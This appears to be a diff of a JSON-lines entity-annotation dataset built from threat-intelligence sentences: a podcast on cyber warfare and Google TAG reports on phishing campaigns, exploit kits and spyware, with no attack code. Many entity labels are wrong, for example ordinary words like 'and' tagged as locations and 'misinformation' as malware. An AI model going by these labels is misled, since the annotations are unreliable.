warfare.","entities":[{"id":17922,"label":"location","start_offset":17,"end_offset":20},{"id":17923,"label":"location","start_offset":45,"end_offset":49},{"id":17925,"label":"location","start_offset":56,"end_offset":59},{"id":17926,"label":"location","start_offset":67,"end_offset":73},{"id":17927,"label":"identity","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} -{"id":5792,"text":"Any initial thoughts around this?","entities":[],"relations":[],"Comments":[]} -{"id":5793,"text":"Maybe explain to the audience what hybrid warfare or cyber warfare is.","entities":[],"relations":[],"Comments":[]} -{"id":5794,"text":"Ed:","entities":[],"relations":[],"Comments":[]} -{"id":5795,"text":"Well, yeah, absolutely.","entities":[],"relations":[],"Comments":[]} -{"id":5799,"text":"And so, when we talk about in terms of cyber conflict, cyber war, it has usually been in the context of just [00:02:00] another element within that 360-degree dominance that they hope to achieve in any conflict of war.","entities":[{"id":17940,"label":"location","start_offset":0,"end_offset":3},{"id":17941,"label":"location","start_offset":61,"end_offset":64},{"id":17942,"label":"identity","start_offset":104,"end_offset":108},{"id":17944,"label":"location","start_offset":179,"end_offset":183},{"id":17945,"label":"location","start_offset":214,"end_offset":217}],"relations":[],"Comments":[]} -{"id":5800,"text":"Cyber is that one space such as air dominance, for example, right?","entities":[],"relations":[],"Comments":[]} -{"id":5802,"text":"And cyberspace is just one of them now, but we're getting into this unique area which we anticipated…could cyber conflict be the main domain that is being acted upon?","entities":[{"id":17948,"label":"location","start_offset":0,"end_offset":3},{"id":17949,"label":"identity","start_offset":18,"end_offset":22},{"id":17951,"label":"location","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} -{"id":5805,"text":"We'll talk about it [00:03:00] here now, but I think when we talk in terms for, especially for here is like cyber conflict, cyber war, or hybrid, and the hybrid piece is just a definition of kinetic and cyber.","entities":[{"id":17957,"label":"TIME","start_offset":21,"end_offset":29},{"id":17958,"label":"location","start_offset":130,"end_offset":133},{"id":17959,"label":"location","start_offset":146,"end_offset":149},{"id":17960,"label":"identity","start_offset":170,"end_offset":174},{"id":17961,"label":"location","start_offset":199,"end_offset":202}],"relations":[],"Comments":[]} -{"id":5806,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5807,"text":"Right.","entities":[],"relations":[],"Comments":[]} -{"id":5810,"text":"And you just have computers fighting it out.","entities":[{"id":17969,"label":"location","start_offset":0,"end_offset":3},{"id":17970,"label":"identity","start_offset":8,"end_offset":12}],"relations":[],"Comments":[]} -{"id":5812,"text":"Ed:","entities":[],"relations":[],"Comments":[]} -{"id":5813,"text":"No, absolutely.","entities":[],"relations":[],"Comments":[]} -{"id":5815,"text":"So cyber is still critical as we become more hyper-connected.","entities":[],"relations":[],"Comments":[]} -{"id":5816,"text":"As we approach ubiquitous computing, ubiquitous connectivity, cyber then becomes very relevant.","entities":[],"relations":[],"Comments":[]} -{"id":5817,"text":"But as we’ve seen, it's an interesting concept because traditionally cyber has just been more of an information gathering or cyber espionage tool to aid any type of conflict.","entities":[{"id":17978,"label":"identity","start_offset":79,"end_offset":83},{"id":17979,"label":"location","start_offset":141,"end_offset":145},{"id":17980,"label":"location","start_offset":157,"end_offset":161}],"relations":[],"Comments":[]} -{"id":5819,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5821,"text":"Ed:","entities":[],"relations":[],"Comments":[]} -{"id":5822,"text":"Well, I mean, it still serves a purpose if you're able to knock down the power or communication, the real two top tier critical infrastructure.","entities":[{"id":17996,"label":"tools","start_offset":58,"end_offset":63},{"id":17997,"label":"location","start_offset":73,"end_offset":78},{"id":17998,"label":"location","start_offset":101,"end_offset":105}],"relations":[],"Comments":[]} -{"id":5825,"text":"That's one of the first areas on either side they're looking to obtain dominance, is to knock out the command and control.","entities":[{"id":18009,"label":"tools","start_offset":88,"end_offset":93},{"id":18010,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} -{"id":5828,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5832,"text":"Ed:","entities":[],"relations":[],"Comments":[]} -{"id":5833,"text":"Oh, absolutely.","entities":[],"relations":[],"Comments":[]} -{"id":5834,"text":"It's nothing new.","entities":[],"relations":[],"Comments":[]} -{"id":5835,"text":"Information warfare, PSYOPs, psychology operations - you name it.","entities":[],"relations":[],"Comments":[]} -{"id":5837,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5838,"text":"We don't need to [00:07:00] drop the pamphlets out of the plane anymore.","entities":[],"relations":[],"Comments":[]} -{"id":5839,"text":"Ed: Exactly.","entities":[],"relations":[],"Comments":[]} -{"id":5840,"text":"You don't need to – everybody's got a phone, right?","entities":[],"relations":[],"Comments":[]} -{"id":5841,"text":"So, you're able to instantaneously provide some type of propaganda or misinformation around the globe.","entities":[{"id":18031,"label":"location","start_offset":48,"end_offset":52},{"id":18032,"label":"malware","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} -{"id":5844,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5845,"text":"They could have done a deep fake of Zelensky talking about something that could have caused panic inside the country.","entities":[],"relations":[],"Comments":[]} -{"id":5846,"text":"Think about something like that happening.","entities":[],"relations":[],"Comments":[]} -{"id":5847,"text":"That's what you're probably going to see in the future as well.","entities":[],"relations":[],"Comments":[]} -{"id":5848,"text":"One other area that we didn't talk about that I thought was pretty interesting was around cyber mercenaries.","entities":[],"relations":[],"Comments":[]} -{"id":5851,"text":"They’re regular citizens.","entities":[],"relations":[],"Comments":[]} -{"id":5857,"text":"Ed:","entities":[],"relations":[],"Comments":[]} -{"id":5858,"text":"Yeah, well, again, everything that we see in cyberspace is a direct analogy on the physical side.","entities":[],"relations":[],"Comments":[]} -{"id":5860,"text":"Such as the term mercenary, right?","entities":[],"relations":[],"Comments":[]} -{"id":5861,"text":"This just makes it unique.","entities":[{"id":18053,"label":"identity","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5869,"text":"They could be patriotic hackers, they could just be guns for hire or cyber guns for hire, so to speak.","entities":[{"id":18062,"label":"identity","start_offset":44,"end_offset":48}],"relations":[],"Comments":[]} -{"id":5876,"text":"Are they really just uniform soldiers behind keyboards?","entities":[{"id":18075,"label":"location","start_offset":0,"end_offset":3},{"id":18076,"label":"identity","start_offset":16,"end_offset":20}],"relations":[],"Comments":[]} -{"id":5877,"text":"So [00:10:00] it's an interesting thing that nobody really likes to talk about it.","entities":[],"relations":[],"Comments":[]} -{"id":5879,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5882,"text":"When you think as nation state, what should a nation state be looking at for the future?","entities":[],"relations":[],"Comments":[]} -{"id":5884,"text":"Ed:","entities":[],"relations":[],"Comments":[]} -{"id":5885,"text":"Yeah, sure, absolutely.","entities":[],"relations":[],"Comments":[]} -{"id":5886,"text":"Just like on the physical or kinetic side, we need to be very cognizant of our critical infrastructure.","entities":[{"id":18091,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} -{"id":5888,"text":"But we really need to understand what is critical.","entities":[],"relations":[],"Comments":[]} -{"id":5890,"text":"Obviously, this is where our focus needs to be, hands down.","entities":[],"relations":[],"Comments":[]} -{"id":5894,"text":"These are the things that I think countries across the globe need to understand, especially here in Western countries, and especially NATO countries, understanding that they need to be shoring up, and almost like DHS says in their program, Shields Up, is really focused on being proactive and protecting those critical sectors.","entities":[{"id":18120,"label":"location","start_offset":6,"end_offset":9},{"id":18121,"label":"malware","start_offset":55,"end_offset":60},{"id":18122,"label":"location","start_offset":100,"end_offset":107},{"id":18123,"label":"location","start_offset":119,"end_offset":122},{"id":18125,"label":"location","start_offset":197,"end_offset":200},{"id":18128,"label":"location","start_offset":289,"end_offset":292}],"relations":[],"Comments":[]} -{"id":5895,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5897,"text":"Because again, that's where we're going to get our information if a conflict does come up.","entities":[],"relations":[],"Comments":[]} -{"id":5899,"text":"Ed, this has been a great discussion.","entities":[],"relations":[],"Comments":[]} -{"id":5902,"text":"Ed:","entities":[],"relations":[],"Comments":[]} -{"id":5904,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5905,"text":"Well, everybody, thanks for joining us again.","entities":[],"relations":[],"Comments":[]} -{"id":5906,"text":"On episode four of #TrendTalksBizSec.","entities":[],"relations":[],"Comments":[]} -{"id":5909,"text":"So, take care, have a great day.","entities":[],"relations":[],"Comments":[]} -{"id":5910,"text":"Thanks Ed.","entities":[],"relations":[],"Comments":[]} -{"id":5911,"text":"Have a good day.","entities":[],"relations":[],"Comments":[]} -{"id":5912,"text":"[00:14:00] Additional Resources:","entities":[{"id":18159,"label":"TIME","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} -{"id":5914,"text":"Link to Jon’s panel discussion in Davos: https:\/\/www.youtube.com\/watch?v=GAZng8u9FXk","entities":[],"relations":[],"Comments":[]} -{"id":5916,"text":"Ed’s social media: @Ed_E_Cabrera (Twitter), https:\/\/www.linkedin.com\/in\/ed-e-cabrera\/ (LinkedIn)","entities":[{"id":18172,"label":"location","start_offset":12,"end_offset":17},{"id":18173,"label":"URL","start_offset":44,"end_offset":85}],"relations":[],"Comments":[]} -{"id":5918,"text":"To protect our users, Google’s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[],"relations":[],"Comments":[]} -{"id":5929,"text":"If the link was not active, the user was redirected directly to a legitimate website.","entities":[],"relations":[],"Comments":[]} -{"id":5931,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":18237,"label":"malware","start_offset":41,"end_offset":46}],"relations":[],"Comments":[]} -{"id":5932,"text":"ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.","entities":[{"id":18242,"label":"malware","start_offset":0,"end_offset":5},{"id":18243,"label":"location","start_offset":49,"end_offset":52}],"relations":[],"Comments":[]} -{"id":5936,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":18253,"label":"location","start_offset":144,"end_offset":148},{"id":18255,"label":"location","start_offset":236,"end_offset":239},{"id":18256,"label":"threat-actor","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} -{"id":5939,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} -{"id":5941,"text":"We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.","entities":[],"relations":[],"Comments":[]} -{"id":5945,"text":"We haven’t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} -{"id":5946,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} -{"id":5954,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} -{"id":5956,"text":"We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.","entities":[],"relations":[],"Comments":[]} -{"id":5958,"text":"We remain committed to updating the community as we uncover these campaigns.","entities":[{"id":18316,"label":"location","start_offset":36,"end_offset":45},{"id":18317,"label":"tools","start_offset":52,"end_offset":59}],"relations":[],"Comments":[]} -{"id":5960,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[{"id":18321,"label":"location","start_offset":53,"end_offset":56},{"id":18322,"label":"tools","start_offset":71,"end_offset":77},{"id":18323,"label":"location","start_offset":78,"end_offset":81},{"id":18324,"label":"location","start_offset":82,"end_offset":90},{"id":18325,"label":"location","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} -{"id":5961,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[],"relations":[],"Comments":[]} -{"id":5963,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":18333,"label":"location","start_offset":97,"end_offset":100},{"id":18334,"label":"location","start_offset":106,"end_offset":110},{"id":18335,"label":"attack-pattern","start_offset":114,"end_offset":122},{"id":18336,"label":"location","start_offset":123,"end_offset":126}],"relations":[],"Comments":[]} -{"id":5967,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[],"relations":[],"Comments":[]} -{"id":5971,"text":"The data is then exfiltrated via email to a compromised email account.","entities":[],"relations":[],"Comments":[]} -{"id":5972,"text":"Malware samples:","entities":[],"relations":[],"Comments":[]} -{"id":5973,"text":"TAG would like to thank the Yahoo! Paranoids Advanced Cyber Threats Team for their collaboration in this investigation.","entities":[],"relations":[],"Comments":[]} -{"id":5977,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":18388,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":18390,"label":"location","start_offset":198,"end_offset":201}],"relations":[],"Comments":[]} -{"id":5979,"text":"The group's tactics, techniques and procedures (TTPs) for these campaigns have shifted slightly from including phishing links directly in the email, to also linking to PDFs and\/or DOCs hosted on Google Drive and Microsoft One Drive.","entities":[{"id":18395,"label":"location","start_offset":32,"end_offset":35},{"id":18396,"label":"attack-pattern","start_offset":111,"end_offset":119},{"id":18398,"label":"location","start_offset":208,"end_offset":211}],"relations":[],"Comments":[]} -{"id":5980,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[{"id":18401,"label":"attack-pattern","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} -{"id":5981,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":18402,"label":"attack-pattern","start_offset":6,"end_offset":14},{"id":18404,"label":"location","start_offset":129,"end_offset":132},{"id":18405,"label":"location","start_offset":148,"end_offset":151}],"relations":[],"Comments":[]} -{"id":5982,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, has remained active during the course of the war and recently resumed targeting of Gmail accounts via credential phishing.","entities":[{"id":18406,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":18407,"label":"attack-pattern","start_offset":39,"end_offset":47},{"id":18408,"label":"tools","start_offset":57,"end_offset":68},{"id":18410,"label":"location","start_offset":142,"end_offset":145},{"id":18411,"label":"location","start_offset":146,"end_offset":149},{"id":18413,"label":"attack-pattern","start_offset":210,"end_offset":218}],"relations":[],"Comments":[]} -{"id":5983,"text":"This campaign, targeting high risk individuals in Ukraine, contained links leading to compromised websites where the first stage phishing page was hosted.","entities":[{"id":18414,"label":"location","start_offset":5,"end_offset":13},{"id":18417,"label":"attack-pattern","start_offset":129,"end_offset":137},{"id":18418,"label":"location","start_offset":138,"end_offset":142}],"relations":[],"Comments":[]} -{"id":5984,"text":"If the user clicked continue, they would be redirected to an attacker controlled site that collected the users credentials.","entities":[],"relations":[],"Comments":[]} -{"id":5987,"text":"In mid-April, TAG detected a Ghostwriter credential phishing campaign targeting Facebook users.","entities":[{"id":18430,"label":"attack-pattern","start_offset":52,"end_offset":60},{"id":18431,"label":"location","start_offset":61,"end_offset":69}],"relations":[],"Comments":[]} -{"id":5989,"text":"Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.","entities":[{"id":18436,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":18437,"label":"attack-pattern","start_offset":41,"end_offset":49},{"id":18438,"label":"location","start_offset":58,"end_offset":61},{"id":18443,"label":"location","start_offset":188,"end_offset":191},{"id":18446,"label":"location","start_offset":239,"end_offset":242}],"relations":[],"Comments":[]} -{"id":5992,"text":" Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[{"id":18457,"label":"location","start_offset":41,"end_offset":44},{"id":18458,"label":"threat-actor","start_offset":67,"end_offset":71}],"relations":[],"Comments":[]} -{"id":5995,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[{"id":18465,"label":"tools","start_offset":61,"end_offset":67},{"id":18466,"label":"location","start_offset":68,"end_offset":71},{"id":18467,"label":"location","start_offset":72,"end_offset":80},{"id":18468,"label":"location","start_offset":94,"end_offset":97},{"id":18469,"label":"location","start_offset":122,"end_offset":126},{"id":18470,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} -{"id":5997,"text":"While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone’s focus on this region.","entities":[{"id":18476,"label":"location","start_offset":9,"end_offset":12},{"id":18478,"label":"location","start_offset":61,"end_offset":64},{"id":18480,"label":"identity","start_offset":91,"end_offset":95},{"id":18481,"label":"location","start_offset":223,"end_offset":229}],"relations":[],"Comments":[]} -{"id":5999,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":18489,"label":"location","start_offset":97,"end_offset":100},{"id":18490,"label":"location","start_offset":106,"end_offset":110},{"id":18491,"label":"attack-pattern","start_offset":114,"end_offset":122},{"id":18492,"label":"location","start_offset":123,"end_offset":126}],"relations":[],"Comments":[]} -{"id":6003,"text":"TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.","entities":[],"relations":[],"Comments":[]} -{"id":6004,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[],"relations":[],"Comments":[]} -{"id":6008,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":18535,"label":"attack-pattern","start_offset":153,"end_offset":161},{"id":18537,"label":"location","start_offset":205,"end_offset":208},{"id":18539,"label":"location","start_offset":257,"end_offset":260}],"relations":[],"Comments":[]} -{"id":6011,"text":"We have not observed any Gmail accounts successfully compromised during these campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":6012,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":18551,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":18552,"label":"attack-pattern","start_offset":39,"end_offset":47},{"id":18553,"label":"threat-actor","start_offset":57,"end_offset":68},{"id":18555,"label":"attack-pattern","start_offset":156,"end_offset":164}],"relations":[],"Comments":[]} -{"id":6013,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":18557,"label":"location","start_offset":16,"end_offset":24},{"id":18558,"label":"location","start_offset":52,"end_offset":56},{"id":18559,"label":"attack-pattern","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} -{"id":6014,"text":"While TAG has previously observed this technique being used by multiple government-backed actors, the media picked up on this blog post, publishing several stories highlighting this phishing capability.","entities":[{"id":18560,"label":"location","start_offset":102,"end_offset":107},{"id":18561,"label":"location","start_offset":131,"end_offset":135},{"id":18562,"label":"attack-pattern","start_offset":182,"end_offset":190}],"relations":[],"Comments":[]} -{"id":6015,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":18563,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":18564,"label":"attack-pattern","start_offset":130,"end_offset":138},{"id":18565,"label":"location","start_offset":139,"end_offset":146},{"id":18566,"label":"location","start_offset":168,"end_offset":173}],"relations":[],"Comments":[]} -{"id":6016,"text":"The new technique, displayed below, draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site.","entities":[{"id":18567,"label":"malware","start_offset":50,"end_offset":54},{"id":18569,"label":"location","start_offset":118,"end_offset":122}],"relations":[],"Comments":[]} -{"id":6018,"text":"Recently observed Ghostwriter credential phishing domains:","entities":[{"id":18572,"label":"attack-pattern","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} -{"id":6019,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[{"id":18573,"label":"tools","start_offset":61,"end_offset":67},{"id":18574,"label":"location","start_offset":68,"end_offset":71},{"id":18575,"label":"location","start_offset":72,"end_offset":80},{"id":18576,"label":"location","start_offset":94,"end_offset":97},{"id":18577,"label":"location","start_offset":122,"end_offset":126},{"id":18578,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} -{"id":6021,"text":"While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone’s focus on this region.","entities":[{"id":18584,"label":"location","start_offset":9,"end_offset":12},{"id":18586,"label":"location","start_offset":61,"end_offset":64},{"id":18588,"label":"identity","start_offset":91,"end_offset":95},{"id":18589,"label":"location","start_offset":223,"end_offset":229}],"relations":[],"Comments":[]} -{"id":6027,"text":"The exploit was patched on February 14, 2022.","entities":[],"relations":[],"Comments":[]} -{"id":6028,"text":"The earliest evidence we have of this exploit kit being actively deployed is January 4, 2022.","entities":[],"relations":[],"Comments":[]} -{"id":6036,"text":"Victims who clicked on the links would be served a hidden iframe that would trigger the exploit kit.","entities":[],"relations":[],"Comments":[]} -{"id":6041,"text":"Attacker-Owned Websites: Compromised Websites (Feb 7 - Feb 9): Exploitation URLs:","entities":[],"relations":[],"Comments":[]} -{"id":6043,"text":"The attackers placed links to the exploit kit within hidden iframes, which they embedded on both websites they owned as well as some websites they compromised.","entities":[],"relations":[],"Comments":[]} -{"id":6047,"text":"If the RCE was successful, the javascript would request the next stage referenced within the script as “SBX”, a common acronym for Sandbox Escape.","entities":[{"id":18653,"label":"malware","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} -{"id":6048,"text":"We unfortunately were unable to recover any of the stages that followed the initial RCE.","entities":[],"relations":[],"Comments":[]} -{"id":6051,"text":"We did not recover any responses from those URLs.","entities":[],"relations":[],"Comments":[]} -{"id":6052,"text":"Example Exploit Kit:","entities":[],"relations":[],"Comments":[]} -{"id":6054,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[{"id":18662,"label":"tools","start_offset":102,"end_offset":108},{"id":18663,"label":"location","start_offset":109,"end_offset":112},{"id":18664,"label":"location","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} -{"id":6059,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across industry.","entities":[{"id":18679,"label":"location","start_offset":3,"end_offset":7},{"id":18680,"label":"location","start_offset":51,"end_offset":54},{"id":18681,"label":"location","start_offset":66,"end_offset":70},{"id":18682,"label":"location","start_offset":86,"end_offset":93},{"id":18683,"label":"location","start_offset":105,"end_offset":108},{"id":18684,"label":"threat-actor","start_offset":109,"end_offset":113},{"id":18685,"label":"location","start_offset":150,"end_offset":158}],"relations":[],"Comments":[]} -{"id":6060,"text":"In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML (CVE-2021-40444).","entities":[{"id":18689,"label":"threat-actor","start_offset":114,"end_offset":125},{"id":18691,"label":"location","start_offset":175,"end_offset":180}],"relations":[],"Comments":[]} -{"id":6061,"text":"Investigating this group's activity, we determined they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) \/ WIZARD SPIDER (CrowdStrike).","entities":[{"id":18692,"label":"location","start_offset":56,"end_offset":59},{"id":18697,"label":"threat-actor","start_offset":187,"end_offset":200},{"id":18698,"label":"identity","start_offset":202,"end_offset":213}],"relations":[],"Comments":[]} -{"id":6064,"text":"EXOTIC LILY is a resourceful, financially motivated group whose activities appear to be closely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol.","entities":[{"id":18707,"label":"location","start_offset":126,"end_offset":129},{"id":18708,"label":"threat-actor","start_offset":178,"end_offset":183},{"id":18709,"label":"location","start_offset":184,"end_offset":187}],"relations":[],"Comments":[]} -{"id":6068,"text":"Additionally and rather uniquely, they leverage legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver the payload, further evading detection mechanisms.","entities":[{"id":18728,"label":"location","start_offset":13,"end_offset":16},{"id":18729,"label":"malware","start_offset":39,"end_offset":47},{"id":18732,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} -{"id":6069,"text":"This level of human-interaction is rather unusual for cyber crime groups focused on mass scale operations.","entities":[],"relations":[],"Comments":[]} -{"id":6070,"text":"EXOTIC LILY’s attack chain has remained relatively consistent throughout the time we’ve been tracking the group: One notable technique is the use of domain and identity spoofing as a way of gaining additional credibility with a targeted organization.","entities":[{"id":18735,"label":"location","start_offset":77,"end_offset":81},{"id":18737,"label":"location","start_offset":156,"end_offset":159},{"id":18738,"label":"attack-pattern","start_offset":160,"end_offset":177},{"id":18739,"label":"location","start_offset":183,"end_offset":186}],"relations":[],"Comments":[]} -{"id":6075,"text":"Using spoofed email accounts, attackers would then send spear phishing emails under the pretext of a business proposal, such as seeking to outsource a software development project or an information security service.","entities":[{"id":18753,"label":"attack-pattern","start_offset":56,"end_offset":70},{"id":18754,"label":"location","start_offset":198,"end_offset":206}],"relations":[],"Comments":[]} -{"id":6079,"text":"Distribution of the actor’s working hours suggest they might be working from a Central or an Eastern Europe timezone.","entities":[],"relations":[],"Comments":[]} +{"id":1268,"text":"Figure 3 shows a GIF file containing an obituary notice for a woman, while Figure 4 shows a Microsoft Word document containing the obituary of a man.","entities":[{"id":46643,"label":"SOFTWARE","start_offset":92,"end_offset":106}],"relations":[],"Comments":[]} +{"id":2481,"text":"Inbound attempts to exploit the SpringShell vulnerability from 194.31.98[.]186 attempted to install the webshell from the original proof-of-concept seen in Figure 14.","entities":[{"id":45533,"label":"IPV4","start_offset":63,"end_offset":78},{"id":47557,"label":"attack-pattern","start_offset":104,"end_offset":112},{"id":47558,"label":"vulnerability","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} +{"id":10285,"text":"Code snippets showing keylogs This secondary payload does not have any function to upload the collected keystrokes back to the attacker.","entities":[],"relations":[],"Comments":[]} +{"id":939,"text":" While not all SMS-based IAP applications steal user data, we recently identified that the Chinese Taomike SDK has begun capturing copies of all messages received by the phone and sending them to a Taomike controlled server.","entities":[{"id":46449,"label":"location","start_offset":91,"end_offset":98},{"id":44904,"label":"attack-pattern","start_offset":42,"end_offset":57},{"id":44905,"label":"malware","start_offset":99,"end_offset":110},{"id":44907,"label":"Infrastucture","start_offset":198,"end_offset":223}],"relations":[{"id":37,"from_id":44905,"to_id":44907,"type":"exfiltrates-to"},{"id":38,"from_id":44905,"to_id":44907,"type":"communicates-with"},{"id":190,"from_id":44905,"to_id":46449,"type":"located-at"},{"id":191,"from_id":44905,"to_id":44904,"type":"uses"}],"Comments":[]} +{"id":10251,"text":"These brute force attacks started in 2019, and then we could firmly attribute them to Pawn Storm because we could cross-relate the extensive probing of Microsoft Autodiscover servers around the world with high-confidence indicators of the group\u2019s more traditional attack methods (spear phishing and credential phishing).","entities":[{"id":31324,"label":"attack-pattern","start_offset":6,"end_offset":17},{"id":31326,"label":"location","start_offset":43,"end_offset":46},{"id":31327,"label":"location","start_offset":78,"end_offset":82},{"id":31328,"label":"threat-actor","start_offset":86,"end_offset":96},{"id":31329,"label":"location","start_offset":114,"end_offset":119},{"id":31332,"label":"location","start_offset":194,"end_offset":199},{"id":31333,"label":"location","start_offset":210,"end_offset":220},{"id":31334,"label":"attack-pattern","start_offset":280,"end_offset":294},{"id":31335,"label":"location","start_offset":295,"end_offset":298},{"id":31336,"label":"attack-pattern","start_offset":310,"end_offset":318}],"relations":[],"Comments":[]} +{"id":10485,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":6742,"text":"One notable campaign attempted to target personal accounts of U.S. government employees with phishing lures using American fast food franchises and COVID-19 messaging.","entities":[{"id":21033,"label":"location","start_offset":12,"end_offset":20},{"id":21034,"label":"location","start_offset":34,"end_offset":40},{"id":21036,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21038,"label":"location","start_offset":144,"end_offset":147}],"relations":[],"Comments":[]} +{"id":1065,"text":"But until now, based on the latest research in the IEEE Security & Privacy paper, everyone has believed that malicious apps attempting to carry out overlay attacks must overcome two significant hurdles to be successful: These are significant mitigating factors and so overlay attacks haven\u2019t been reckoned a serious threat.","entities":[{"id":46549,"label":"identity","start_offset":51,"end_offset":55},{"id":44929,"label":"attack-pattern","start_offset":269,"end_offset":284},{"id":44930,"label":"attack-pattern","start_offset":148,"end_offset":163}],"relations":[],"Comments":[]} +{"id":6632,"text":" The DarkHydrus threat group has targeted government entities and educational institutions with spear-phishing attacks and credential harvesting campaigns.","entities":[{"id":20576,"label":"threat-actor","start_offset":5,"end_offset":15},{"id":20577,"label":"location","start_offset":62,"end_offset":65},{"id":20578,"label":"location","start_offset":96,"end_offset":101},{"id":20579,"label":"attack-pattern","start_offset":102,"end_offset":110},{"id":20580,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} +{"id":12578,"text":"The exception indicates that Apple added generic protections in Big Sur which rendered this exploit useless.","entities":[],"relations":[],"Comments":[]} +{"id":2554,"text":"The answer is simple: credential theft.","entities":[{"id":47748,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} +{"id":11253,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[],"relations":[],"Comments":[]} +{"id":75,"text":"There is no single solution to stopping these attacks, but the same technologies and policies you use to prevent other malware infections will be effective.","entities":[{"id":44590,"label":"attack-pattern","start_offset":119,"end_offset":137}],"relations":[],"Comments":[]} +{"id":1163,"text":"And indeed, as with the second hypothesis, standard virus detection logs prove that each of these mutexes do span multiple variants of the worm.","entities":[],"relations":[],"Comments":[]} 